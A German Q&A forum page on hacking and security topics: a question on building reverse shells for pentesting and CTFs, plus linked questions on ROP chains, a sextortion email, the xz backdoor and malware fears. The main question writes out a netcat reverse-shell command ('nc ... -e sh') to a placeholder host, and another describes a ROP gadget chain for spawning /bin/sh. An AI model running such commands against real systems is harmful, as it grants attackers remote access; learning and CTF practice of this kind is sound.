Wie erstellt ihr eure Reverse Shells?

Für Pentesting und CTF Challenges braucht man manchmal eine Reverse Shell, um RCE auf dem Zielsystem zu erlangen. Am besten geht das mit einer öffentlichen IPv4 Adresse, dann ist ein Befehl wie dieser ausreichend:

nc -lvnp 9001

Und auf dem Zielsystem kann man sich dann z.B. mit diesem Befehl verbinden:

nc 1.2.3.4 9001 -e sh

Oder man verwendet andere Methoden, je nach Möglichkeit.

Allerdings sind öffentliche IP Adressen inzwischen leider sehr selten geworden, und mit NAT funktionieren Reverse Shells nicht mehr.

Wie geht ihr vor, wenn ihr mal eine Reverse Shell braucht?

1 Antwort

Thomasg

26.05.2024, 19:08

Buch dir halt irgendwo einen günstigen vserver mit einer öffentlichen ip und lass die Reverse Shell Verbindung darüber laufen.

Woher ich das weiß:Berufserfahrung – Seit langer Zeit als Systemadministrator tätig

Ich versuche, rücksprungorientierte Programmierung (ROP) zu lernen.

Und zwar habe ich ein Programm mit einem Pufferüberlauf auf dem Stack, und ich möchte das Programm dazu bringen, /bin/sh zu öffnen.

Das geht mit dem execve Syscall, wenn ich die richtigen Instruktionen finden kann, um die Funktionsparameter vorzubereiten. Das ist die Signatur von execve:

int execve(const char *pathname, char *const _Nullable argv[], char *const _Nullable envp[]);

Also muss ich die folgenden Register setzen:

rax = 0x3b (Syscallnummer von execve)
rdi = "/bin/sh" Pointer
rsi = NULL
rdx = NULL

Die folgenden Instruktionen habe ich bereits gefunden:

pop rax ; ret
pop rdi ; ret
pop rsi ; ret
pop rdx ; ret
syscall

Ich kann also die Instruktionen und Registerwerte mit dem Pufferüberlauf auf den Stack schreiben und so meine Register füllen. Das Problem ist aber, dass ich einen "/bin/sh" Pointer in rdi brauche (also nicht "/bin/sh" im Register, sondern eine Speicheradresse, an der "/bin/sh" steht).

Ich kann natürlich "/bin/sh" in den Puffer auf dem Stack schreiben, aber leider ist die Speicheradresse jedes Mal anders und ich kenne sie vorher nicht.

Ich weiß, dass "/bin/sh" in libc vorkommt, aber auch dort ist die Speicheradresse jedes Mal anders und ich kenne sie vorher nicht.

Wie komme ich also an einen "/bin/sh" Pointer? Gibt es Tricks oder bestimmte Instruktionen, nach denen ich mich umsehen sollte?

...zur Frage

Kann jeder hacken lernen?

Ich möchte hacken lernen und dem CCC beitreten, aber ich befürchte, dass ich zu dumm dafür bin.

Denkt ihr, mit genug Motivation kann jeder hacken lernen, oder muss man dazu sehr intelligent sein?

...zur Frage

Drohungs Email, wurde ich wirklich gehackt?

Guten Tag, ich habe in den letzten Tagen mehrmals eine Email von einer Anonymen Person bekommen welche mir sagt das ich mir Malware heruntergeladen hätte und sie nun alle meine Passwörter, vollen zugriff auf meinen PC und zugriff auf meine Webcam hat. Als beweis wurden mir alle meine Passwörter gezeigt und diese waren auch richtig. Natürlich habe ich überall meine Passwörter geändert aber irgendwie kommt mir diese Email komisch vor, diese Emails bekomme ich nun seit dem 10. Oktober aber in den Emails steht ich hätte Zeit vom 19.09.2023 bis zum 21.09.2023 (48 Stunden) um eine bestimmte Summe in Bitcoin zu zahlen welches ich sehr merkwürdig finde da der 21.09 schon vor ein paar Wochen war. Noch dazu beträgt die Summe immer eine andere Zahl, 800$, 1200$ und 500$. Mir wird also damit gedroht das meine Passwörter geleaked werden und persönliche Daten auf irgendwelchen Servern hochgeladen wird. Ich habe auf der Seite haveibeenpwned.com geguckt ob meine Passwörter und Email Adressen geleaked wurden aber dort stand das alles gut ist. Nun weiß ich nicht was zu tun ist. Auf jeden fall werde ich die Summe nicht bezahlen und obwohl die Sache sehr komisch aussieht habe ich dennoch bedenken da die Person wirklich alle meine alten Passwörter und Emailadressen hatte bevor ich die geändert hab. Denkt ihr das ist echt oder nur ein Scam und wenn es echt ist was soll ich tun? Bitte schnell antworten, danke. L.G.

...zur Frage

Welche Art von CTF Challenge ist am einfachsten?

...zur Frage

Welche IP braucht man für eine Kali Linux reverse shell?

Hallo, komme mit den ganzen IPs gerade durcheinander, habe einen PC und einen Laptop und will auf dem PC hören ob eine Verbindung kommt ( Angreifer ) und dementsprechend auf dem Laptop dann verbinden. Das funktioniert im selben Netzwerk. Aber welche IP brauche ich denn jetzt genau ? Weil bei mir wird immer angezeigt das ich meine ip4 nicht anpingen kann trotz Virtual Box bridge configuration...

...zur Frage

Wie kann man am besten heap pwn lernen?

Es ist sehr schwer.

...zur Frage

Autorun 64, Rot markierte Dateien, Hacker? System schaden?

Ich habe Autorun 64 geöffnet und habe direkt Dateien entdeckt die Rot markiert sind. Bei jeder Datei davon steht Name eines Internetabieters mit der beschreibung Shell extension wo ich allerdings NIE Kunde war. Habe normal versucht zu löschen und auch im Abgesicherten Modus, aber da stand jeweils bloß das es nicht geht da die Datei oder der Ordner an einem anderem Programm offen seien, aber im Taskmanager fand ich nix. Als ich die dll Datei im Betroffenen Ordner öffnen wollte, Kam eine Meldung das das verändern oder löschen dem System schaden kann. Hab dann gemerkt das ich im Autorun64 diese einzeln löschen kann eine habe ich gelöscht. Nun mag ich wissen ist das etwas worüber ich mir sorgen machen sollte sprich Hacker zb? Und soll ich nun trotz dieser Meldung diese nacheinander löschen?

...zur Frage

Hintertür in xz gefunden - Kann man überhaupt noch einer Software vertrauen, die man nicht selbst geschrieben hat?

xz ist ein unter Linux weit verbreitetes Datenkompressionsformat. Ein Entwickler der Referenzimplementierung xz-utils (https://github.com/tukaani-project/xz) hat vor kurzem eine Hintertür (CVE-2024-3094) eingebaut, mit der in manchen Linux Distributionen sshd kompromittiert werden kann. Bisher wurde noch kein CVE Score zugewiesen, aber ich schätze diese Hintertür als sehr kritisch ein. Bestimmt werden in den nächsten Tagen Heise, Golem, etc. darüber berichten, und vielleicht sogar die Mainstream Medien.

Die Hintertür wurde gefunden, weil der Schadcode Performanceprobleme in sshd verursacht hat. Glücklicherweise sind die betroffenen xz Versionen noch nicht weit verbreitet, da Pakete in vielen Distributionen nur sehr langsam aktualisiert werden. In Arch Linux wurde bereits eine betroffene xz Version ausgeliefert, aber da sshd in Arch Linux kein gz verwendet, ist ein Angriff in diesem Fall nicht möglich.

Dennoch ist dieser Vorfall äußerst besorgniserregend, da die Hintertür von einem xz Entwickler eingebaut wurde, der bereits mehrere Jahre am Projekt beteiligt war und als vertrauenswürdig galt.

Grundsätzlich galt Open Source Software als weniger anfällig für Hintertüren als Closed Source Software. Man ging davon aus, dass Hintertüren in Open Source Software gefunden werden, bevor sie überhaupt veröffentlicht werden, da der Code von vielen unabhängigen Experten überprüft wird. Ein häufig genanntes Beispiel, das diese These untermauern soll, ist ein 2003 gescheiterter Versuch, eine Hintertür in den Linux Kernel einzubauen.

Der aktuelle Vorfall zeigt, dass es sehrwohl möglich ist, Schadcode unentdeckt in weit verbreitete Open Source Software einzubauen. Dies wirft die Frage auf, inwieweit man fremder Software überhaupt noch vertrauen kann.

Seid ihr selbst von dieser Hintertür betroffen? Wie schützt ihr euch? Habt ihr Zweifel an der Sicherheit von Open Source Software? Denkt ihr, dass dieser Vorfall zu einem Umdenken bei der Vertrauenswürdigkeit von Open Source Entwicklern führen wird?

Weitere Informationen

https://lwn.net/Articles/967180/
https://lwn.net/ml/oss-security/20240329155126.kjjfduxw2yrlxgzm@awork3.anarazel.de/
https://www.cisa.gov/news-events/alerts/2024/03/29/reported-supply-chain-compromise-affecting-xz-utils-data-compression-library-cve-2024-3094
https://archlinux.org/news/the-xz-package-has-been-backdoored/
https://arstechnica.com/security/2024/03/backdoor-found-in-widely-used-linux-utility-breaks-encrypted-ssh-connections/
https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27

...zur Frage

Warum ist das CTF Team der TUM so gut?

Sie sind derzeit weltweit auf Platz 80 (von zehntausenden Teams): https://ctftime.org/team/113083/

Ich studiere auch an der TUM, bin aber leider gar nicht gut in CTFs.

...zur Frage

Ist die Google CTF Platzierung relevant für Bewerbungen bei Google?

Ich nehme an diesem Wochenende mit einem Kumpel am Google Online CTF teil. Wir sind beide totale CTF Noobs, aber wollen just for fun mitmachen. Wir erwarten natürlich nicht, irgendetwas zu gewinnen.

Um teilzunehmen, muss man sich bei Google anmelden. Jetzt frage ich mich, ob die bei einer Bewerbung sehen können, dass ich am CTF teilgenommen und keine gute Platzierung erreicht habe? Ich möchte nicht aus diesem Grund aussortiert werden, wenn ich mich z.B. für eine Internship in den USA bewerbe.

Soll ich lieber einen Fakeaccount nur für das CTF erstellen?

...zur Frage

It Sicherheit , Hacker angriffe etc?

In der Vergangenheit ist es öfter vorgekommen das unser Unternehmen gehackt wurde. Jetzt hätten wir gerne einen 100% Schutz. Ich glaube nicht das so etwas geht, es sei denn man zieht den Stecker vom Internet :D.

Nun habe ich eine It unternehmen gefunden was 100% Schutz anbietet, allerdings sehr teuer, ich wüsste gerne ob das Serös ist und ob es Erfahrungen dahingegen gibt.

das Unternehmen heist Coreprotect https://www.core-protect.de

und wirbt mit 100% Schutz vor Hacker angriffen.

...zur Frage

PC VIRUS DRINGEND HILFE GESUCHT?

Liebe PC-Expertinnen und -Experten,

Ich wende mich dringend an euch, da ich mit meinem PC schon das ganze Jahr über massive Probleme habe. Trotz mehrfacher Neuinstallation von Windows und der Verwendung eines bezahlten Antivirenprogramms bin ich jedes Mal erneut von Problemen betroffen. Diesmal stehe ich vor einer besonders schwerwiegenden Situation.

Wenn ich meinen PC starte, geschieht Folgendes:

Der PC fährt hoch.
Dann bleibt er im Blackscreen hängen.

Selbst im abgesicherten Modus konnte ich das Problem nicht beheben; auch Versuche mit verschiedenen erweiterten Optionen wie CMD-Befehlen (z.B., dism.exe und sfc scannow) blieben erfolglos. Ich habe den Verdacht, dass ich Opfer eines extremen Hacks geworden bin.

Ich bin völlig ratlos und habe alles versucht, um mein System zu retten, einschließlich des Zurücksetzens. Doch selbst das wurde vom Virus blockiert, und ich stehe vor derselben Ausgangssituation wie zuvor.

Da ich nicht über die finanziellen Mittel verfüge, einen professionellen Techniker zu beauftragen, der den Virus entfernt, bitte ich euch um eure Hilfe. Ich bin am Ende meiner Kräfte und hoffe auf euer Verständnis.

Vielen Dank im Voraus und einen schönen Abend wünsche ich euch.

Mit freundlichen Grüßen,

Steven

...zur Frage

Beste kostenlose vpn?

Hey ich möchte mal ins Darknet gegen mich da umschauen und so. Was ist da halt alles gibt weil ich es wissen möchte.

( schon mal vorab habe keine illegale Energie also ich werde nichts illegales machen)

Aber ich würde mal unsere Chatrooms gehen wo man mit anderen Leuten reden kann und so findet das extrem interessant.

Aber naja da gibt's halt auch Leute die einen Hacken voll also deswegen wollte ich fragen welcher vpn für sowas am besten ist wo man komplett anonym ist wo niemand weiß wer man ist.

...zur Frage

Was ist der Sinn von TLS_NULL_WITH_NULL_NULL?

Warum überhaupt TLS verwenden, wenn die Sicherheit egal ist?

https://ciphersuite.info/cs/TLS_NULL_WITH_NULL_NULL/

...zur Frage

Was möchtest Du wissen?

Deine Frage stellen